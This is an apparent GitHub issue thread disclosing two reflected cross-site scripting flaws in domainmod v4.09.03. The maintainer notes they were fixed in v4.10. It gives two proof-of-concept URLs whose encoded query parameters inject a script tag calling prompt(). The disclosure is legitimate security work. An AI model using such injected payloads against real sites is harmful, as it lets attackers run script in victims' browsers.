### ISSUE TITLE
There is two cross-site scripting vulnerability

### ISSUE THREAD

**Issue by anquanquantao** [domainmod/domainmod#63]
Two xss vulnerability was discovered in domainmod v4.09.03
There are two XSS attacks vulnerability which allows remote attackers to inject arbitrary web script or HTML.

1、http://127.0.0.1/assets/edit/ssl-provider-account.php?del=1&sslpaid=%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt%28931289%29%3C/ScRiPt%3E

2、http://127.0.0.1/assets/edit/account-owner.php?del=1&oid=%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt%28973761%29%3C/ScRiPt%3E

**Comment by chetcuti** [comment]
This issue was fixed in [v4.10](https://github.com/domainmod/domainmod/releases/tag/v4.10.0).
